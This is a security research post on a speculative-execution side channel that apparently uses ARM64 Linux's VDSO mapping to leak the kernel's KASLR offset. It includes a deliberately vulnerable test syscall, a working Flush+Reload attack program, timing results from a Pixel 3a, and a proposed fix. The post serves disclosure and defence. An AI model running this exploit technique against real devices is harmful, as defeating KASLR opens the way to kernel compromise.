VDSO As A Potential KASLR Oracle

Post by Philip Pettersson and Alex Radocea

Introduction

The VDSO region can serve as an oracle to bypass KASLR via speculative sidechannels. This post covers what the VDSO region is, how Linux KASLR works, and an example gadget that exploits the sidechannel. We show some experimental timing results and a suggested fix.

Table of Contents

  • What is VDSO
  • Linux KASLR
  • Speculative Sidechannels
  • Cache Timing Primitives
  • Example Vulnerable Syscall
  • Attack Implementation
  • Results
  • A Suggested Fix

What is VDSO

The "VDSO" ("virtual dynamic shared object") is a special region of the kernel that is mapped into all userland processes. The userland virtual address of the VDSO region will differ in each process, but they all point to the same physical page of memory.

This region was created to address the problem of syscall overhead. While this overhead has been reduced over the years from the traditional "int 0x80" mechanism on 32-bit x86, invoking a system call still carries an unavoidable cost on any Linux platform.

This overhead can become a problem for small system calls that are called repeatedly in tight loops. If the kernel-side work of the system call is very short, the overhead is naturally a larger share of the total execution time. This is especially true for system calls that only return a simple kernel data value.

To solve this issue, the VDSO contains special vdso versions of the system calls which fit these criteria. As of this writing, these system calls are all related to timing measurements (arm64/x86):

clock_gettime()
gettimeofday()
clock_getres()
time()

Since these are all simple data-fetcher type functions that are commonly used in loops, the Linux kernel defines vdso versions of these system calls which do not cross the user-kernel boundary. The kernel accomplishes this by mapping a vdso code page into each userland process, as well as a vdso data page called vvar. These are shared mappings that all point to the same global kernel pages.

When a userland program calls clock_gettime(), for example, libc knows that a vdso version of the system call exists and jumps to it in the special vdso code page. That function simply reads the correct value from the vdso data page and returns it, just as the kernel code would - but without crossing the kernel boundary and incurring the overhead.
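
The savings are easy to measure. The following sketch (an illustration, not from the original post) times repeated clock_gettime() calls through libc, which dispatches to the vdso, against the same calls forced through syscall(2), which always traps into the kernel; the vdso path should come out several times faster:

    #include <stdio.h>
    #include <time.h>
    #include <unistd.h>
    #include <sys/syscall.h>

    #define ITERS 1000000

    static long elapsed_ns(struct timespec a, struct timespec b) {
        return (b.tv_sec - a.tv_sec) * 1000000000L + (b.tv_nsec - a.tv_nsec);
    }

    int main(void) {
        struct timespec ts, t0, t1;

        //vdso path: libc resolves this to the [vdso] code page
        clock_gettime(CLOCK_MONOTONIC, &t0);
        for (int i = 0; i < ITERS; i++)
            clock_gettime(CLOCK_MONOTONIC, &ts);
        clock_gettime(CLOCK_MONOTONIC, &t1);
        printf("vdso:    %ld ns\n", elapsed_ns(t0, t1));

        //syscall path: syscall(2) bypasses the vdso and crosses the boundary
        clock_gettime(CLOCK_MONOTONIC, &t0);
        for (int i = 0; i < ITERS; i++)
            syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &ts);
        clock_gettime(CLOCK_MONOTONIC, &t1);
        printf("syscall: %ld ns\n", elapsed_ns(t0, t1));

        return 0;
    }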

On ARM64 the code page is called vdso and points to the kernel page vdso_start which is located in the kernel TEXT region. The data page is called vvar and points to the kernel page vdso_data.

arch/arm64/kernel/vdso.c

    /* Populate the special mapping structures */
    mappings->data_mapping = (struct vm_special_mapping) {
        .name   = "[vvar]",
        .pages  = &vdso_pagelist[0],
    };

    mappings->code_mapping = (struct vm_special_mapping) {
        .name   = "[vdso]",
        .pages  = &vdso_pagelist[1],
    };

Linux KASLR

KASLR ("Kernel Address Space Layout Randomization") is a Linux security feature that ensures that the kernel is located at different addresses on each boot. This helps complicate the exploitation of many types of memory corruption vulnerabilities since an attacker can't immediately know the location of data structures they want to change, or functions they want to call. Linux on ARM64 has had KASLR support since version 4.6.

It implements this by randomizing the virtual start addresses of the kernel TEXT and module regions. Some kernels additionally place the kernel at a random physical memory address.

If an attacker can leak the virtual address of a kernel function at runtime, the secret randomization value that was used at boot can easily be deduced given a copy of the kernel image.

As an example, let's examine the runtime address of vdso_start on a Pixel 3 running Android 10:

sargo:/ # echo 0 > /proc/sys/kernel/kptr_restrict
sargo:/ # grep vdso_start /proc/kallsyms
ffffff8a83a01000 R vdso_start

We can compare this with the raw offset for vdso_start, which we can extract from the firmware image using gdb:

% ~/android-ndk-r21b/prebuilt/darwin-x86_64/bin/gdb ./vmlinux
GNU gdb (GDB) 8.3
...
(gdb) p vdso_start
$1 = {<text variable, no debug info>} 0xffffff8009c01000 <vdso_start>
(gdb) p _text
$2 = {<text variable, no debug info>} 0xffffff8008080000 <_text>

The offset of vdso_start in the kernel TEXT is 0x1b81000:

>>> hex(0xffffff8009c01000 - 0xffffff8008080000)
'0x1b81000L'

Now we can calculate the randomized start of the runtime kernel by simply subtracting the known offset from the runtime virtual address of vdso_start:

>>> hex(0xffffff8a83a01000 - 0x1b81000)
'0xffffff8a81e80000L'

sargo:/ # grep 'T _text' /proc/kallsyms
ffffff8a81e80000 T _text

Therefore, if we can leak the virtual address of vdso_start we can bypass KASLR.

Speculative Sidechannels

In 2016, Lipp et al. published ARMageddon, a paper that covers ARM cache sidechannel attacks in detail, including techniques such as Prime+Probe, Flush+Reload, and Evict+Reload. In January 2018, Spectre and Meltdown were announced. These papers demonstrate how to exploit speculative execution, sometimes in concert with cache timing sidechannels, to disclose memory contents across privilege boundaries or leak the address space layout.

Speculative execution is a performance technique in which the CPU executes future instructions ahead of time, before knowing whether they will actually be reached. If they are on the correct path, their results are kept and the instructions retire normally. If they are not, the instructions are squashed rather than retired, and any memory/register side effects are supposed to be reverted and ignored.

In terms of security, any side effects that are not reverted can lead to bypasses: for example, the disclosure of privileged memory to an unprivileged process. Some side effects, like cache state updates, were a substantial surprise to the public security industry, though not to CPU designers, when Spectre came out. The cache sidechannels can potentially be mitigated with speculation barriers that constrain out-of-order execution. Other side effects, like differences in timing due to microarchitectural implementation flaws, cannot be avoided or reverted without firmware or CPU fixes.

As a result of Meltdown, the Linux kernel implemented KPTI. To defend against Spectre on ARM, several kernel mitigations are in place. The variant groups have the following key mitigations:

  • Variant 1 -- data speculation barriers have been implemented across critical user-kernel boundaries (see the sketch after this list)

  • Variant 2 -- instruction cache invalidation is performed around context switches, and additional firmware-level mitigations have been created to harden branch predictors

  • Variant 3 -- KPTI for Meltdown

  • Variant 4 -- SSBS/SSBD mitigations in firmware disable speculative store bypass at boot time or per process
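
To make the Variant 1 mitigation concrete: rather than paying for a full barrier on every access, the arm64 kernel clamps untrusted array indices with a branchless mask followed by a CSDB instruction. The sketch below is in the spirit of the kernel's array_index_mask_nospec(); the function name here is our own:

    //returns ~0UL when idx < sz and 0 otherwise, without a conditional
    //branch that speculation could bypass
    static inline unsigned long index_mask_nospec(unsigned long idx,
                                                  unsigned long sz)
    {
        unsigned long mask;

        asm volatile(
            "cmp  %1, %2\n"       //carry is set when idx >= sz
            "sbc  %0, xzr, xzr\n" //mask = (idx < sz) ? ~0UL : 0
            "csdb"                //no speculative use of the result
            : "=r" (mask)
            : "r" (idx), "r" (sz)
            : "cc");

        return mask;
    }

    //usage: idx &= index_mask_nospec(idx, array_size); before array[idx]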

Several projects have implemented proofs of concept for these vulnerabilities. Some of the best are Safeside and IAIK's transientfail. The transient.fail website presents an excellent taxonomy of the main known speculative variants.

A particularly simple Spectre variant abuses the Pattern History Table (PHT), which predicts loop branches. Given a nested loop whose inner body dereferences memory, the PHT keeps predicting that the inner loop will continue, so speculative execution runs past the loop bound. This leads to speculative out-of-bounds array accesses, which have cache side effects.

PHT Speculative Execution Example

    //uses flush(), flush_reload_t() and CACHE_MISS_THRESHOLD from IAIK's libcache
    void *vdso = (void *) getauxval(AT_SYSINFO_EHDR);
    unsigned char *parray[2048];
    unsigned char *data = (unsigned char *) "data string";
    int N = 1024;
    int *Memory = malloc(sizeof(int));
    size_t delta;

    for (int i = 0; i < N; i++) {
        parray[i] = data;
    }
    for (int i = N; i < (int)(sizeof(parray)/sizeof(parray[0])); i++) {
        parray[i] = vdso;
    }

    //the loop bound lives behind a pointer, read on every iteration
    *Memory = N;

    flush(vdso); //clear out vdso from the cache

    unsigned char x;

    // SPEC EXEC CODE STARTS HERE
    for (int outer = 0; ; outer++) {
        for (int inner = 0; inner < *Memory; inner++) {

            //a speculative memory barrier would block this attack
            //mbarrier();

            //speculative execution from the PHT dereferences inner+1, inner+2, etc.
            x = parray[inner][0];

            //time access to vdso then invalidate it from cache
            delta = flush_reload_t(vdso);

            if (delta < CACHE_MISS_THRESHOLD * 0.7) {
                printf("hit: %zd\n", delta);
            }

            //use x to avoid being optimized out by the compiler
            if (x == 0xfe) {
                printf("this is unexpected\n");
            }
        }
    }

Surprisingly, the vdso pointer ends up being read and stored in cache due to speculative execution going out of bounds. Measuring the cache using Flush+Reload demonstrates this readily across Linux ARM devices.

Cache Timing Primitives

The ARM cache architecture is implementation dependent and differs in several key ways from, say, Intel's. This slidedeck has some good pointers. The following list is helpful for understanding how ARM may differ from other CPUs:

  • A split instruction and data cache at L1
  • An instruction cache which is typically virtually indexed at L1, but a data cache that is physically indexed from L1 and above
  • A point of unification for the split caches at L2 or L3
  • Shareability attributes dictating whether coherency is maintained across all cores or only a subset
  • "Clean" writes dirty data back, pushing it out towards the point of coherency
  • A clean typically happens upon eviction, but can also be triggered directly with CPU instructions, some of which are unprivileged on ARMv8 (this was not possible on ARMv7)
  • "Invalidate" empties lines of cache
  • Memory attributes control how write-backs happen

Critically for this article, data memory reads from two distinct virtual addresses which reference the same physical address are served by the same cache lines at each level of physically indexed cache. And for performance, physically indexed caches are not flushed across a context switch from EL0 to EL1 or EL1 to EL0.

This leads to a key attack primitive. Across exception levels, a lower exception level can measure cache access to determine if a higher exception level accessed the same physical memory.

In the case of the VDSO, we have pages of memory with a .text kernel virtual address, which get mapped into userland processes. Using Flush+Reload it is possible to measure a kernel system call (or other process) accessing VDSO memory as follows:

  1. At EL0, run instructions to clean/invalidate a data cache line in the VDSO via the userland address
  2. Context switch into EL1 by running a system call which accesses VDSO memory via the kernel virtual address
  3. Context switch back into EL0 when the system call returns
  4. Time a memory access to VDSO memory via the userland address (a sketch of these EL0 primitives follows the list)
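
Steps 1 and 4 can be built entirely from unprivileged ARMv8 instructions. Below is a minimal sketch, assuming EL0 access to the DC CIVAC cache maintenance instruction and the CNTVCT_EL0 counter (Linux enables both for userland by default); IAIK's libcache, used later, provides similar primitives:

    #include <stdint.h>

    //step 1: clean+invalidate the data cache line holding p, by userland VA
    static inline void flush_line(void *p) {
        asm volatile("dc civac, %0" :: "r"(p) : "memory");
        asm volatile("dsb ish" ::: "memory");
    }

    //step 4: time a single load of p with the generic timer. A small delta
    //(cache hit) means the physical line was touched since the last flush,
    //even if the kernel touched it through its own virtual address.
    static inline uint64_t time_load(void *p) {
        uint64_t t0, t1;
        asm volatile("isb; mrs %0, cntvct_el0; isb" : "=r"(t0) : : "memory");
        *(volatile unsigned char *)p;
        asm volatile("isb; mrs %0, cntvct_el0; isb" : "=r"(t1) : : "memory");
        return t1 - t0;
    }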

Combining this concept with Spectre: if a system call can be made to speculatively access virtual memory addresses injected by userland, it becomes possible to create a KASLR oracle. Userland abuses the vulnerable system call with various KASLR guesses and then measures the results.

Example Vulnerable Syscall

Real-world gadgets depend on the emitted instructions keeping the memory dereference in the inner loop, which is critical for mistraining the Pattern History Table into speculatively indexing the array out of bounds. Additionally, a real-world gadget requires control of which pointer will be dereferenced, for example by controlling pointers on a heap chunk boundary.

To demonstrate this attack across the boundary, consider the following test system call. For simplicity, this routine is compiled without any optimization.
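
The struct spectre_data definition is not shown in the original snippet; a layout consistent with the checks below and with the userland struct in the next section would be:

struct spectre_data {
        int len;
        void *values[128];
};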

__attribute__((optnone))
asmlinkage long sys_spectre_test(unsigned long inBuf, unsigned long inLen, unsigned long outerLen, unsigned long __user *ret_p)
{
        int i, j;
        int ret = 0;
        struct spectre_data data;

        if (inLen > sizeof(data)) {
                return -EINVAL;
        }

        if (copy_from_user(&data, (void __user *)inBuf, inLen)) {
                return -EFAULT;
        }

        if (data.len > 128) {
                return -EPERM;
        }

        for (i = 0; i < data.len; i++) {
                data.values[i] = (char *)&ret;
        }

        //every value past data.len is initialized by userland.
        //Speculative execution due to PHT misprediction will see
        //inner >= data.len being dereferenced and stored in cache.
        for (j = 0; j < outerLen; j++) {
                for (i = 0; i < data.len; i++) {
                        ret += ((char *)data.values[i])[0] + j;
                }
        }

        if (put_user((unsigned long)ret, ret_p)) {
                return -EFAULT;
        }

        return 0;
}

Attack Implementation

#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <sys/syscall.h>

//From https://github.com/IAIK/transientfail/tree/master/pocs/libcache
#include "../../../libcache/cacheutils.h"

struct spectre_struct {
    int len;
    void* values[128];
};

int main(int argc, const char **argv) {
    struct spectre_struct data;
    unsigned long ret_val = 0;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <vdso_start guess>\n", argv[0]);
        return 1;
    }

    void *vdso = (void *) getauxval(AT_SYSINFO_EHDR);
    pagesize = sysconf(_SC_PAGESIZE);

    if(!CACHE_MISS)
        CACHE_MISS = detect_flush_reload_threshold();
    printf("Flush+Reload Threshold: %zu\n", CACHE_MISS);

    uint64_t delta, mini = 20000;

    //from testing -- vdso + 4096 + 1024 does not collide with data accessed
    //when a new process is created, so it avoids false positives
    int roll_offset = 4096 + 1024;
    void *vdso_target = (char *)vdso + roll_offset;

    //the real vdso_start, or the guess, comes from argv[1]
    void *guess = (void *)(strtoull(argv[1], NULL, 0) + roll_offset);

    data.len = 7;

    for (int i = 0; i < (int)(sizeof(data.values)/sizeof(data.values[0])); i++) {
        data.values[i] = guess;
    }

    flush(vdso_target);

    for (;;) {
        //jump into kernel for spec exec (297 is sys_spectre_test)
        syscall(297, &data, sizeof(data), 8192, &ret_val);

        delta = flush_reload_t(vdso_target);

        if (delta < mini) {
            mini = delta;
            printf("%zd %s\n", mini, mini < (CACHE_MISS*0.8) ? "*" : "");
            if (mini < (CACHE_MISS*0.8)) exit(0);
        }
    }

    return 0;
}

Results

Tests were run on a Pixel 3a, which features a Snapdragon 670.

sargo:/ $ cat /proc/cpuinfo
Processor   : AArch64 Processor rev 12 (aarch64)
processor   : 0
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 1
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 2
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 3
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 4
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 5
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 6
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x6
CPU part    : 0x802
CPU revision    : 13

processor   : 7
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x6
CPU part    : 0x802
CPU revision    : 13

Hardware    : Qualcomm Technologies, Inc SDM670


# With a correct guess
$ grep vdso_start /proc/kallsyms
ffffff846c601000 R vdso_start


time ./experiment 0xffffff846c601000

Flush+Reload Threshold: 217
521
417
313
156 *
1m37.23s real     0m03.31s user     0m27.01s system


# With a wrong guess

time ./experiment 0xffffff946c601000

Flush+Reload Threshold: 217
521
417
313
260
^C

A Suggested Fix

A fix is relatively simple: Linux can randomize the location of the VDSO pages independently from the rest of the kernel code and data, so that leaking the VDSO's virtual address has no security impact.
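
As a hypothetical sketch of that idea for arch/arm64/kernel/vdso.c (an illustration, not an actual kernel patch): at boot, copy the vdso image out of kernel TEXT into freshly allocated pages and hand those to vdso_pagelist, so the pages mapped into userland no longer alias the randomized kernel image:

//Hypothetical sketch only. vdso_start, vdso_end and vdso_pagelist are the
//existing symbols in arch/arm64/kernel/vdso.c; slot 0 of vdso_pagelist is
//assumed to hold the vvar data page, with the code pages following it.
static int __init vdso_detach_from_text(void)
{
        unsigned long nr_pages = (vdso_end - vdso_start) >> PAGE_SHIFT;
        unsigned long i;

        for (i = 0; i < nr_pages; i++) {
                struct page *page = alloc_page(GFP_KERNEL);

                if (!page)
                        return -ENOMEM;

                //give userland a copy whose physical pages are unrelated
                //to the KASLR slide of the kernel TEXT region
                memcpy(page_address(page), vdso_start + i * PAGE_SIZE, PAGE_SIZE);
                vdso_pagelist[i + 1] = page;
        }

        return 0;
}

A real patch would also need instruction cache maintenance on the copied pages before userland executes them.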